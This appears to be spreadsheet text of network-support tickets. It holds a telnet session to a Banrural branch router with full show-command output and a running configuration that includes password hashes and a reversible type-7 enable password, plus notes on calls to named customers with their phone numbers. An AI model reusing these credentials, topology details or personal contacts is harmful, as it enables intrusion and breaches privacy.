CONEXIONES. CLIENTE VALIDA ENLACE OPERATIVO.
UTP4 STATUS AND CONFIGURATION
LINK	SPEED	DUPLEX
UP	1000BASE-T	
&lt;YGUAGTGUN1D1C00A03EIM1&gt;PING -VPN-INSTANCE BANRURAL 10.72.105.103
  PING 10.72.105.103: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.72.105.103: BYTES=56 SEQUENCE=1 TTL=255 TIME=7 MS
    REPLY FROM 10.72.105.103: BYTES=56 SEQUENCE=2 TTL=255 TIME=6 MS
    REPLY FROM 10.72.105.103: BYTES=56 SEQUENCE=3 TTL=255 TIME=6 MS
    REPLY FROM 10.72.105.103: BYTES=56 SEQUENCE=4 TTL=255 TIME=7 MS
    REPLY FROM 10.72.105.103: BYTES=56 SEQUENCE=5 TTL=255 TIME=6 MS
  --- 10.72.105.103 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 6/6/7 MS
&lt;YGUAGTGUN1D1C00A03EIM1&gt;
&lt;YGUAGTGUN1D1C00A03EIM1&gt;!!
&lt;YGUAGTGUN1D1C00A03EIM1&gt;
&lt;YGUAGTGUN1D1C00A03EIM1&gt;TEL VPN-INSTANCE BANRURAL 10.72.105.103
TRYING 10.72.105.103 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.72.105.103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 LOGIN INVALID
USERNAME: ENABLE
PASSWORD:
% LOGIN INVALID
USERNAME: GESTIONIP
PASSWORD:
CC_BANRURAL_GT_AGENCIA_0151&gt;ENABLE
PASSWORD:
CC_BANRURAL_GT_AGENCIA_0151#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 - REPLICATED ROUTE, % - NEXT HOP OVERRIDE
GATEWAY OF LAST RESORT IS 10.72.105.129 TO NETWORK 0.0.0.0
O*IA  0.0.0.0/0 [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
      10.0.0.0/8 IS VARIABLY SUBNETTED, 70 SUBNETS, 5 MASKS
O        10.18.65.129/32
           [110/24] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.18.65.253/32
           [110/24] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.18.66.25/32
           [110/24] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
C        10.72.105.96/27 IS DIRECTLY CONNECTED, GIGABITETHERNET0/0
L        10.72.105.103/32 IS DIRECTLY CONNECTED, GIGABITETHERNET0/0
C        10.72.105.128/26 IS DIRECTLY CONNECTED, GIGABITETHERNET0/1
O        10.72.105.129/32
           [110/24] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.132/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.133/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.134/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.135/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
L        10.72.105.136/32 IS DIRECTLY CONNECTED, GIGABITETHERNET0/1
O        10.72.105.137/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.138/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.139/32
           [110/24] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
O        10.72.105.140/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.142/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.143/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.144/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.145/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.146/32
           [110/25] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/25] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O        10.72.105.147/32
           [110/24] VIA 10.72.105.147, 00:06:51, GIGABITETHERNET0/1
O        10.72.140.17/32
           [110/24] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.130.65.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
C        10.131.51.16/29 IS DIRECTLY CONNECTED, VLAN1
L        10.131.51.17/32 IS DIRECTLY CONNECTED, VLAN1
O N2     10.131.80.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.132.72.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.132.94.16/29
           [110/1] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
O N2     10.133.44.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.133.56.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.133.61.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.133.91.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.134.89.16/29
           [110/20] VIA 10.72.105.147, 00:06:51, GIGABITETHERNET0/1
O N2     10.135.25.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.135.189.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.135.220.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.137.74.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.138.28.16/29
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.160.65.0/24
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
C        10.161.51.0/24 IS DIRECTLY CONNECTED, VLAN1
L        10.161.51.126/32 IS DIRECTLY CONNECTED, VLAN1
O N2     10.161.80.0/24
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.162.72.0/24
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.162.94.0/24
           [110/1] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
O N2     10.163.44.0/24
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.163.56.0/24
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.163.61.0/24
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
O N2     10.163.91.0/24
           [110/20] VIA 10.72.105.139, 00:06:46, GIGABITETHERNET0/1
           [110/20] VIA 10.72.105.129, 00:07:39, GIGABITETHERNET0/1
CC_BANRURAL_GT_AGENCIA_0151#H IP INT BRIE
HELP IP INT BRIE
     ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_BANRURAL_GT_AGENCIA_0151#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN REDUNDANTE/_/8901526T/_/
GI0/1                          UP             UP       WAN PRINCIPAL/_/8900639T/_/
GI0/1/0                        UP             UP       LAN DEL CLIENTE
GI0/1/1                        DOWN           DOWN
GI0/1/2                        DOWN           DOWN
GI0/1/3                        DOWN           DOWN
BV1                            ADMIN DOWN     DOWN
LO5                            UP             UP       MONITOREO DEL CNOC
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_AGENCIA_0151#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.105.97            1   8CFD.18A2.85BE  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.105.103           -   D867.D9AB.A2A0  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.105.129           2   8CFD.18A2.85BE  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.105.136           -   D867.D9AB.A2A1  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.105.139           7   3458.40C8.2627  ARPA   GIGABITETHERNET0/1
INTERNET  10.72.105.147           6   00D0.D660.8E9C  ARPA   GIGABITETHERNET0/1
INTERNET  10.131.51.17            -   D867.D9AB.A2A3  ARPA   VLAN1
INTERNET  10.131.51.22            0   F08E.DB17.9106  ARPA   VLAN1
INTERNET  10.161.51.126           -   D867.D9AB.A2A3  ARPA   VLAN1
CC_BANRURAL_GT_AGENCIA_0151#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000         2      2000         3         0
* GIGABITETHERNET0/1            0         0         0         0    143000        48     85000        60         0
* GIGABITETHERNET0/1/0          0         0         0         0     79000        60    206000        63         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/3          0         0         0         0         0         0         0         0         0
  BVI1                          0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0     84000        60    142000        48         0
CC_BANRURAL_GT_AGENCIA_0151#SH LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 3 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 36 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 36 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 40 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.587: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JAN  2 12:00:02.763: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
JAN  2 12:00:02.939: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = DATAK9 AND LICENSE = DATAK9
MAY 11 14:13:31.007: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
MAY 11 14:13:31.011: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
MAY 11 14:13:31.999: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 11 14:13:31.999: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 11 14:13:32.891: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
MAY 11 14:13:33.119: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
MAY 11 14:13:33.119: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 11 14:13:35.067 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
MAY 11 14:13:35.671 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
MAY 11 14:13:35.671 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
MAY 11 14:13:36.615 UTC: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 11 14:13:36.615 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 11 14:13:36.679 UTC: %LINK-5-CHANGED: INTERFACE BVI1, CHANGED STATE TO ADMINISTRATIVELY DOWN
MAY 11 14:13:37.691 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
MAY 11 14:13:37.691 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
MAY 11 14:13:38.543 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
MAY 11 14:13:38.543 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/1, CHANGED STATE TO DOWN
MAY 11 14:13:38.543 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/2, CHANGED STATE TO DOWN
MAY 11 14:13:38.543 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/3, CHANGED STATE TO DOWN
MAY 11 14:13:38.547 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.2(2)T1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2012 BY CISCO SYSTEMS, INC.
COMPILED WED 29-FEB-12 19:19 BY PROD_REL_TEAM
MAY 11 14:13:38.547 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_0151 IS UNDERGOING A COLD START
MAY 11 14:13:39.203 UTC: %OSPF-4-NSSA_NO_FA: OSPF PROCESS 1 LACKS FORWARDING ADDRESS FOR TYPE 7 LSA 10.131.51.16 IN NSSA 164 - P-BIT CLEARED
MAY 11 14:13:39.203 UTC: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
MAY 11 14:13:39.203 UTC: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
MAY 11 14:13:39.203 UTC: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
MAY 11 14:13:39.203 UTC: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
MAY 11 14:13:41.163 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
MAY 11 14:13:41.199 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 11 14:13:42.163 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
MAY 11 14:13:42.199 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
MAY 11 14:13:46.471 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.105.129 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
MAY 11 14:14:36.711 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.105.147 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
MAY 11 14:14:41.435 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.105.139 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
CC_BANRURAL_GT_AGENCIA_0151#SH CLOCK
14:21:33.439 UTC WED MAY 11 2022
CC_BANRURAL_GT_AGENCIA_0151#SH VER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151 UPTIME IS 8 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 14:13:01 UTC WED MAY 11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2485G9
6 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#   PID                   SN
-------------------------------------------------
*0        CISCO1941/K9          FTX162485G9
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    RIGHTTOUSE     SECURITYK9
DATA          DATAK9        RIGHTTOUSE     DATAK9
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_0151# SH INVENTORY
NAME: "CISCO1941/K9 CHASSIS", DESCR: "CISCO1941/K9 CHASSIS"
PID: CISCO1941/K9      , VID: V04 , SN: FTX162485G9
NAME: "4 PORT GE NON-POE EHWIC SWITCH ON SLOT 0 SUBSLOT 1", DESCR: "4 PORT GE NON-POE EHWIC SWITCH"
PID: EHWIC-4ESG        , VID: V01 , SN: FOC18320SPW
NAME: "C1941/C2901 AC POWER SUPPLY", DESCR: "C1941/C2901 AC POWER SUPPLY"
PID: PWR-1941-2901-AC  , VID:    , SN:
CC_BANRURAL_GT_AGENCIA_0151#SH PROCESSES CPU HISTORY
CC_BANRURAL_GT_AGENCIA_0151   02:21:33 PM WEDNESDAY MAY 11 2022 UTC
      111111111111111111111111111111222221111111111444441111111111
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER SECOND (LAST 60 SECONDS)
           1
      4444434
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10      *
     0....5....1....1....2....2....3....3....4....4....5....5....6
               0    5    0    5    0    5    0    5    0    5    0
               CPU% PER MINUTE (LAST 60 MINUTES)
              * = MAXIMUM CPU%   # = AVERAGE CPU%
  100
   90
   80
   70
   60
   50
   40
   30
   20
   10
     0....5....1....1....2....2....3....3....4....4....5....5....6....6....7..
               0    5    0    5    0    5    0    5    0    5    0    5    0
                   CPU% PER HOUR (LAST 72 HOURS)
                  * = MAXIMUM CPU%   # = AVERAGE CPU%
CC_BANRURAL_GT_AGENCIA_0151# SH RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 4340 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.2
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_0151
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 4 EFGGPN07/DWJB.UGZOURJMJZHPAPLRUWH/NVNVXUK6.
ENABLE PASSWORD 7 0010160A034E0A
!
NO AAA NEW-MODEL
!
!
NO IPV6 CEF
IP AUTH-PROXY MAX-LOGIN-ATTEMPTS 5
IP ADMISSION MAX-LOGIN-ATTEMPTS 5
!
!
!
!
!
NO IP DOMAIN LOOKUP
IP CEF
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX162485G9
LICENSE BOOT MODULE C1900 TECHNOLOGY-PACKAGE SECURITYK9
LICENSE BOOT MODULE C1900 TECHNOLOGY-PACKAGE DATAK9
!
!
USERNAME GESTIONIP SECRET 4 J97D2KYDSNA1WFDCO/9OZ72YEJCXHSGT1W6FUL8O/O.
!
REDUNDANCY
!
!
!
!
!
!
!
!
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.72 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN REDUNDANTE/_/8901526T/_/
 BANDWIDTH 1024
 IP ADDRESS 10.72.105.103 255.255.255.224
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/8900639T/_/
 BANDWIDTH 4096
 IP ADDRESS 10.72.105.136 255.255.255.192
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/1/1
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/1/2
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET0/1/3
 NO IP ADDRESS
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.131.51.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.161.51.126 255.255.255.0
 IP FLOW INGRESS
 IP FLOW EGRESS
 RATE-LIMIT INPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 512000 1024000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 NO AUTOSTATE
!
INTERFACE BVI1
 NO IP ADDRESS
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 SHUTDOWN
!
ROUTER OSPF 1
 ROUTER-ID 10.72.105.136
 AREA 164 NSSA
 REDISTRIBUTE CONNECTED SUBNETS ROUTE-MAP CONNECTED
 NETWORK 10.72.105.128 0.0.0.63 AREA 164
 NEIGHBOR 10.72.105.129
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
IP FLOW-TOP-TALKERS
 TOP 10
 SORT-BY BYTES
 CACHE-TIMEOUT 30
!
IP ROUTE 0.0.0.0 0.0.0.0 10.72.105.97 225 NAME REDUNDANCIA_WIMAX
!
!
IP PREFIX-LIST CONNECTED SEQ 5 PERMIT 10.161.51.0/24
IP PREFIX-LIST CONNECTED SEQ 10 PERMIT 10.212.120.72/32
IP PREFIX-LIST CONNECTED SEQ 15 PERMIT 10.131.51.16/29
IP SLA 1
 ICMP-ECHO 10.72.105.129 SOURCE-IP 10.72.105.136
 FREQUENCY 5
IP SLA SCHEDULE 1 LIFE FOREVER START-TIME NOW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AGE151 - SALAMA CENTRO C.C. PLAZA LA HACIENDA KM.145.5 RUTA DE GUATEMALA A SALAMA
SNMP-SERVER ENABLE TRAPS ENTITY-SENSOR THRESHOLD
!
CONTROL-PLANE
!
BRIDGE 1 PROTOCOL IEEE
BRIDGE 1 ROUTE IP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151#</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. SELVIN TRUJILLO 58278836 NO CONTESTO, ID: 1001696984.</t>
  </si>
  <si>
    <t>F4559815</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ANY GUZMAN 41543713 PARA SOLICITAR DATOS DE VISITA TECNICA
-ID 1001719326
NOMBRE DEL CLIENTE: INSTITUTO DE LA DEFENSA PUBLICA PENAL
UBICACIÓN:4A. AVENIDA 2-39 ZONA 1 ESCUINTLA
CONTACTO EN SITIO:ANY GUZMAN 41543713
HORARIO DE ATENCION:8:00 - 15:30
GESTIÓN DE PERMISOS: UNICAMENTE LLEGAR IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4559834</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 24119191 EXT 10583 10582 QUIEN BRINDA CONTACTO DE PR  LUIS GUTIERREZ - 51190446
-ID 1001723956</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS GUTIERREZ 51190446 PERO ENVIA DIRECTAMENTE A BUZON
-ID 1001725418 - 1001725644</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRYAN ALBIZUREZ 24119191 EXT 10583 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001701884 - 1001702490</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GUTIERREZ AL 51190446 NO RESPONDE, ENVIA DIRECTO A  BUZON || SE INTENTARA LUEGO **
ID 1001741849
**</t>
  </si>
  <si>
    <t>F4559836</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  HENRY AL 30192528 INDICA QUE NO CUENTAN CON ENERGIA EN SITIO **
ID 1001732446
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HENRY 30192528 PERO NO RESPONDE, SE INTENTARA LUEGO
-ID 1001726546</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO CHIQUIN 45281088 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001708725</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE HENRY AL 30192528 CLIENTE NO RESPONDE, ENVIA A BUZON, SE INTENTARA LUEGO **
ID 1001716693
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FRANCISCO CHIQUIN 45281088 INDICA QUE ES OTRO COMPAÑERO QUE ESTA A CARGO DE LA FISCALIA ES EL SEÑOR  HENRY 30192528 **
-ID 1001715940
**</t>
  </si>
  <si>
    <t>F4559847</t>
  </si>
  <si>
    <t>SE LLAMA A JOSUE HERRERA 70136426 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 1001865138</t>
  </si>
  <si>
    <t>SE LE INFORMA A SR. JOSUE HERRERA QUE EL EQUIPO MERAKI NO ESTA ASOCIADO AL ROUTER CISCO, SE LE SOLICITA APLICAR REINICIO, INFORMA QUE HAY QUE LLAMAR AL PUNTO REMOTO PARA RELIZAR LAS PRUEBAS. SE PLICO REINICO AL PUERTO PERO ENLACE AUN NO LEVANTA.
CC_GMG_GT_INTERNET_TIENDA_090#SH ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.174.141.225          0   B443.2600.EDD5  ARPA   GIGABITETHERNET0/0
INTERNET  10.174.141.226          -   B838.611C.B7E0  ARPA   GIGABITETHERNET0/0
INTERNET  186.151.205.41          -   B838.611C.B7E1  ARPA   GIGABITETHERNET0/1
INTERNET  186.151.205.42          0   INCOMPLETE      ARPA
